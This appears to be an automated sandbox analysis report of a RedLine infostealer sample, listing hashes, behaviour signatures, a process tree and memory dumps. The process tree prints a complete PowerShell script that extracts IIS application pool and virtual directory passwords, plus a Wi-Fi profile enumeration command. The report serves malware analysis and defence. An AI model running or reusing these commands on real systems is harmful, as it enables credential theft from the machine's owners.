Overview

overview

10

Static

static

3

JaffaCakes...ee.exe

windows7-x64

10

JaffaCakes...ee.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    118s
  • max time network
    119s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    10-01-2025 23:42

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    JaffaCakes118_f162da7407ec0d56f153f08c817bf1ee.exe

  • Size

    6.2MB

  • MD5

    f162da7407ec0d56f153f08c817bf1ee

  • SHA1

    6ff148b2d2311a424a45f8f46e8cd6b740c41f63

  • SHA256

    d958f2039f2f14ff670d77c4c024c7a76351fbad9ef9fb28dfeabac5ae7f54fe

  • SHA512

    45dd63e6321e08c099dcc16566f96d45397f6ab4234065a98adb455355d6492fd01234482239ea631893bc943d792f22e0fe3255b98486d381c51af322831a34

  • SSDEEP

    49152:NP7rJgonyEuRj1OrE1Wi7xOX4AMVoEweTRK:hr2onuF8X4APe9

Score
10/10
redlinediscoveryevasioninfostealerpersistenceprivilege_escalationspywarestealertrojan

Malware Config

Signatures

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

    infostealerredline
  • Redline family
    redline
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 3 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
    evasiontrojan
  • Enumerates connected drives 3 TTPs 1 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Network Share Discovery 1 TTPs

    Attempt to gather information on host network.

    discovery
  • Drops file in Windows directory 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

    discovery
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

    persistenceprivilege_escalation
  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 1 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

    discovery
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 9 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_f162da7407ec0d56f153f08c817bf1ee.exe
    "C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_f162da7407ec0d56f153f08c817bf1ee.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:1052
    • C:\Users\Admin\AppData\Local\Temp\go-memexec-207687691.exe
      C:\Users\Admin\AppData\Local\Temp\go-memexec-207687691.exe
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Checks whether UAC is enabled
      • Enumerates connected drives
      • Drops file in Windows directory
      • Checks processor information in registry
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2912
      • C:\Windows\system32\netsh.exe
        "netsh" wlan show profiles
        3⤵
        • Event Triggered Execution: Netsh Helper DLL
        • System Network Configuration Discovery: Wi-Fi Discovery
        PID:2032
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" # Check if appcmd.exe exists if (Test-Path ('C:\Windows\system32\inetsrv\appcmd.exe')) { # Create data table to house results $DataTable = New-Object System.Data.DataTable # Create and name columns in the data table $Null = $DataTable.Columns.Add('user') $Null = $DataTable.Columns.Add('pass') $Null = $DataTable.Columns.Add('type') $Null = $DataTable.Columns.Add('vdir') $Null = $DataTable.Columns.Add('apppool') # Get list of application pools Invoke-Expression 'C:\Windows\system32\inetsrv\appcmd.exe list apppools /text:name' | ForEach-Object { # Get application pool name $PoolName = $_ # Get username $PoolUserCmd = 'C:\Windows\system32\inetsrv\appcmd.exe list apppool ' + $PoolName + ' /text:processmodel.username' $PoolUser = Invoke-Expression $PoolUserCmd # Get password $PoolPasswordCmd = 'C:\Windows\system32\inetsrv\appcmd.exe list apppool ' + $PoolName + ' /text:processmodel.password' $PoolPassword = Invoke-Expression $PoolPasswordCmd # Check if credentials exists if (($PoolPassword -ne '') -and ($PoolPassword -isnot [system.array])) { # Add credentials to database $Null = $DataTable.Rows.Add($PoolUser, $PoolPassword,'Application Pool','NA',$PoolName) } } # Get list of virtual directories Invoke-Expression 'C:\Windows\system32\inetsrv\appcmd.exe list vdir /text:vdir.name' | ForEach-Object { # Get Virtual Directory Name $VdirName = $_ # Get username $VdirUserCmd = 'C:\Windows\system32\inetsrv\appcmd.exe list vdir ' + $VdirName + ' /text:userName' $VdirUser = Invoke-Expression $VdirUserCmd # Get password $VdirPasswordCmd = 'C:\Windows\system32\inetsrv\appcmd.exe list vdir ' + $VdirName + ' /text:password' $VdirPassword = Invoke-Expression $VdirPasswordCmd # Check if credentials exists if (($VdirPassword -ne '') -and ($VdirPassword -isnot [system.array])) { # Add credentials to database $Null = $DataTable.Rows.Add($VdirUser, $VdirPassword,'Virtual Directory',$VdirName,'NA') } } # Check if any passwords were found if( $DataTable.rows.Count -gt 0 ) { # Display results in list view that can feed into the pipeline #$DataTable | Sort-Object type,user,pass,vdir,apppool | Select-Object user,pass,type,vdir,apppool -Unique $DataTable | Select-Object user,pass,type,vdir,apppool } else { # Status user Write-host 'No application pool or virtual directory passwords were found.' } }
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:684

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • \Users\Admin\AppData\Local\Temp\go-memexec-207687691.exe
    Filesize

    1.8MB

    MD5

    cb81cf1955f75231e0ee811868e501ce

    SHA1

    616978067da6f166e12057b794b8bcfd3ce7877b

    SHA256

    f04b25b722a4d88283aec685d343eae86681a28fe5c4499c1929e85c743ad761

    SHA512

    853e721e8e56e9f68994a7c2c4822692ad70ea876f5022d1e492593b9c8d5a857b69dff5328bda6fe2250b0bf04fc45e1eb4470d977374f9cd540e100c8add42

    Download Submit

  • memory/2912-5-0x000007FEF5F93000-0x000007FEF5F94000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2912-6-0x000000013F500000-0x000000013F6DA000-memory.dmp

    Filesize

    1.9MB

    Download

  • memory/2912-7-0x000007FEF5F90000-0x000007FEF697C000-memory.dmp

    Filesize

    9.9MB

    Download

  • memory/2912-8-0x000007FEF5F90000-0x000007FEF697C000-memory.dmp

    Filesize

    9.9MB

    Download

  • memory/2912-16-0x000007FF709E0000-0x000007FF709F4000-memory.dmp

    Filesize

    80KB

    Download

  • memory/2912-15-0x000007FF25D60000-0x000007FF25D6D000-memory.dmp

    Filesize

    52KB

    Download

  • memory/2912-39-0x0000000002310000-0x0000000002324000-memory.dmp

    Filesize

    80KB

    Download

  • memory/2912-41-0x0000000020E30000-0x0000000020FD3000-memory.dmp

    Filesize

    1.6MB

    Download

  • memory/2912-53-0x0000000002310000-0x000000000235A000-memory.dmp

    Filesize

    296KB

    Download

  • memory/2912-60-0x0000000002310000-0x0000000002322000-memory.dmp

    Filesize

    72KB

    Download

  • memory/2912-75-0x000000001CC80000-0x000000001CD09000-memory.dmp

    Filesize

    548KB

    Download

  • memory/2912-101-0x0000000002310000-0x000000000236C000-memory.dmp

    Filesize

    368KB

    Download

  • memory/2912-102-0x0000000140000000-0x00000001405E8000-memory.dmp

    Filesize

    5.9MB

    Download

  • memory/2912-100-0x0000000002310000-0x000000000236A000-memory.dmp

    Filesize

    360KB

    Download

  • memory/2912-99-0x0000000002310000-0x0000000002353000-memory.dmp

    Filesize

    268KB

    Download

  • memory/2912-98-0x0000000000930000-0x0000000000932000-memory.dmp

    Filesize

    8KB

    Download

  • memory/2912-97-0x0000000000930000-0x0000000000932000-memory.dmp

    Filesize

    8KB

    Download

  • memory/2912-96-0x0000000002310000-0x000000000232A000-memory.dmp

    Filesize

    104KB

    Download

  • memory/2912-95-0x0000000002310000-0x0000000002331000-memory.dmp

    Filesize

    132KB

    Download

  • memory/2912-94-0x0000000002310000-0x000000000233F000-memory.dmp

    Filesize

    188KB

    Download

  • memory/2912-93-0x0000000000930000-0x000000000093C000-memory.dmp

    Filesize

    48KB

    Download

  • memory/2912-92-0x0000000000930000-0x000000000093C000-memory.dmp

    Filesize

    48KB

    Download

  • memory/2912-91-0x0000000000930000-0x0000000000940000-memory.dmp

    Filesize

    64KB

    Download

  • memory/2912-90-0x0000000002310000-0x0000000002325000-memory.dmp

    Filesize

    84KB

    Download

  • memory/2912-89-0x0000000002310000-0x0000000002334000-memory.dmp

    Filesize

    144KB

    Download

  • memory/2912-88-0x0000000000930000-0x000000000093E000-memory.dmp

    Filesize

    56KB

    Download

  • memory/2912-87-0x0000000002310000-0x000000000232E000-memory.dmp

    Filesize

    120KB

    Download

  • memory/2912-86-0x000000001CC80000-0x000000001CD03000-memory.dmp

    Filesize

    524KB

    Download

  • memory/2912-85-0x000000001CC80000-0x000000001CD03000-memory.dmp

    Filesize

    524KB

    Download

  • memory/2912-84-0x0000000000930000-0x000000000093C000-memory.dmp

    Filesize

    48KB

    Download

  • memory/2912-83-0x0000000000930000-0x000000000093C000-memory.dmp

    Filesize

    48KB

    Download

  • memory/2912-82-0x0000000002310000-0x0000000002361000-memory.dmp

    Filesize

    324KB

    Download

  • memory/2912-81-0x0000000002310000-0x0000000002324000-memory.dmp

    Filesize

    80KB

    Download

  • memory/2912-80-0x0000000002310000-0x000000000232B000-memory.dmp

    Filesize

    108KB

    Download

  • memory/2912-79-0x0000000000930000-0x000000000093F000-memory.dmp

    Filesize

    60KB

    Download

  • memory/2912-78-0x0000000002310000-0x0000000002336000-memory.dmp

    Filesize

    152KB

    Download

  • memory/2912-77-0x0000000002310000-0x0000000002355000-memory.dmp

    Filesize

    276KB

    Download

  • memory/2912-76-0x000000001CC80000-0x000000001CD09000-memory.dmp

    Filesize

    548KB

    Download

  • memory/2912-74-0x0000000000930000-0x000000000093D000-memory.dmp

    Filesize

    52KB

    Download

  • memory/2912-73-0x0000000002310000-0x0000000002332000-memory.dmp

    Filesize

    136KB

    Download

  • memory/2912-72-0x0000000002310000-0x0000000002321000-memory.dmp

    Filesize

    68KB

    Download

  • memory/2912-71-0x0000000000930000-0x000000000093B000-memory.dmp

    Filesize

    44KB

    Download

  • memory/2912-68-0x0000000000930000-0x0000000000940000-memory.dmp

    Filesize

    64KB

    Download

  • memory/2912-67-0x0000000002310000-0x0000000002335000-memory.dmp

    Filesize

    148KB

    Download

  • memory/2912-66-0x0000000000930000-0x000000000093E000-memory.dmp

    Filesize

    56KB

    Download

  • memory/2912-65-0x0000000000930000-0x0000000000937000-memory.dmp

    Filesize

    28KB

    Download

  • memory/2912-64-0x0000000000930000-0x0000000000937000-memory.dmp

    Filesize

    28KB

    Download

  • memory/2912-63-0x0000000002310000-0x000000000233A000-memory.dmp

    Filesize

    168KB

    Download

  • memory/2912-62-0x0000000002310000-0x0000000002340000-memory.dmp

    Filesize

    192KB

    Download

  • memory/2912-61-0x0000000002310000-0x0000000002326000-memory.dmp

    Filesize

    88KB

    Download

  • memory/2912-59-0x0000000002310000-0x000000000234A000-memory.dmp

    Filesize

    232KB

    Download

  • memory/2912-58-0x0000000000930000-0x0000000000938000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2912-57-0x0000000000930000-0x0000000000938000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2912-56-0x0000000002310000-0x000000000235C000-memory.dmp

    Filesize

    304KB

    Download

  • memory/2912-55-0x0000000000930000-0x0000000000940000-memory.dmp

    Filesize

    64KB

    Download

  • memory/2912-54-0x0000000000930000-0x0000000000940000-memory.dmp

    Filesize

    64KB

    Download

  • memory/2912-70-0x0000000000930000-0x0000000000939000-memory.dmp

    Filesize

    36KB

    Download

  • memory/2912-69-0x0000000000930000-0x0000000000939000-memory.dmp

    Filesize

    36KB

    Download

  • memory/2912-52-0x0000000002310000-0x000000000235A000-memory.dmp

    Filesize

    296KB

    Download

  • memory/2912-51-0x0000000020E30000-0x0000000021034000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/2912-50-0x0000000020E30000-0x0000000021034000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/2912-49-0x0000000002310000-0x000000000233B000-memory.dmp

    Filesize

    172KB

    Download

  • memory/2912-48-0x0000000002310000-0x0000000002370000-memory.dmp

    Filesize

    384KB

    Download

  • memory/2912-47-0x0000000000930000-0x000000000093A000-memory.dmp

    Filesize

    40KB

    Download

  • memory/2912-46-0x0000000002310000-0x0000000002321000-memory.dmp

    Filesize

    68KB

    Download

  • memory/2912-45-0x000000001CC80000-0x000000001CCF2000-memory.dmp

    Filesize

    456KB

    Download

  • memory/2912-44-0x000000001CC80000-0x000000001CCF2000-memory.dmp

    Filesize

    456KB

    Download

  • memory/2912-43-0x0000000002310000-0x000000000232B000-memory.dmp

    Filesize

    108KB

    Download

  • memory/2912-42-0x0000000002310000-0x000000000236E000-memory.dmp

    Filesize

    376KB

    Download

  • memory/2912-40-0x0000000020E30000-0x0000000020FD3000-memory.dmp

    Filesize

    1.6MB

    Download

  • memory/2912-38-0x0000000002310000-0x000000000235C000-memory.dmp

    Filesize

    304KB

    Download

  • memory/2912-37-0x0000000000930000-0x0000000000940000-memory.dmp

    Filesize

    64KB

    Download

  • memory/2912-36-0x0000000000930000-0x0000000000940000-memory.dmp

    Filesize

    64KB

    Download

  • memory/2912-35-0x0000000000930000-0x000000000093B000-memory.dmp

    Filesize

    44KB

    Download

  • memory/2912-34-0x0000000002310000-0x000000000233A000-memory.dmp

    Filesize

    168KB

    Download

  • memory/2912-33-0x0000000002310000-0x000000000232A000-memory.dmp

    Filesize

    104KB

    Download

  • memory/2912-32-0x0000000002310000-0x000000000236C000-memory.dmp

    Filesize

    368KB

    Download

  • memory/2912-31-0x0000000002310000-0x000000000236C000-memory.dmp

    Filesize

    368KB

    Download

  • memory/2912-30-0x0000000002310000-0x0000000002325000-memory.dmp

    Filesize

    84KB

    Download

  • memory/2912-29-0x0000000000930000-0x000000000093D000-memory.dmp

    Filesize

    52KB

    Download

  • memory/2912-28-0x0000000002310000-0x0000000002343000-memory.dmp

    Filesize

    204KB

    Download

  • memory/2912-27-0x0000000002310000-0x0000000002343000-memory.dmp

    Filesize

    204KB

    Download

  • memory/2912-26-0x0000000000930000-0x000000000093A000-memory.dmp

    Filesize

    40KB

    Download

  • memory/2912-25-0x0000000000930000-0x0000000000939000-memory.dmp

    Filesize

    36KB

    Download

  • memory/2912-24-0x0000000000930000-0x0000000000939000-memory.dmp

    Filesize

    36KB

    Download

  • memory/2912-23-0x0000000002310000-0x0000000002367000-memory.dmp

    Filesize

    348KB

    Download

  • memory/2912-22-0x0000000000930000-0x000000000093F000-memory.dmp

    Filesize

    60KB

    Download

  • memory/2912-21-0x0000000000930000-0x000000000093F000-memory.dmp

    Filesize

    60KB

    Download

  • memory/2912-20-0x000000001D1A0000-0x000000001D244000-memory.dmp

    Filesize

    656KB

    Download

  • memory/2912-19-0x000007FF404C0000-0x000007FF40580000-memory.dmp

    Filesize

    768KB

    Download

  • memory/2912-18-0x0000000002310000-0x000000000236E000-memory.dmp

    Filesize

    376KB

    Download

  • memory/2912-17-0x0000000002310000-0x000000000236E000-memory.dmp

    Filesize

    376KB

    Download

  • memory/2912-14-0x000007FF70450000-0x000007FF7045A000-memory.dmp

    Filesize

    40KB

    Download

  • memory/2912-13-0x000007FF70450000-0x000007FF7045A000-memory.dmp

    Filesize

    40KB

    Download

  • memory/2912-12-0x000007FF346C0000-0x000007FF34709000-memory.dmp

    Filesize

    292KB

    Download

  • memory/2912-11-0x0000000140000000-0x00000001405E8000-memory.dmp

    Filesize

    5.9MB

    Download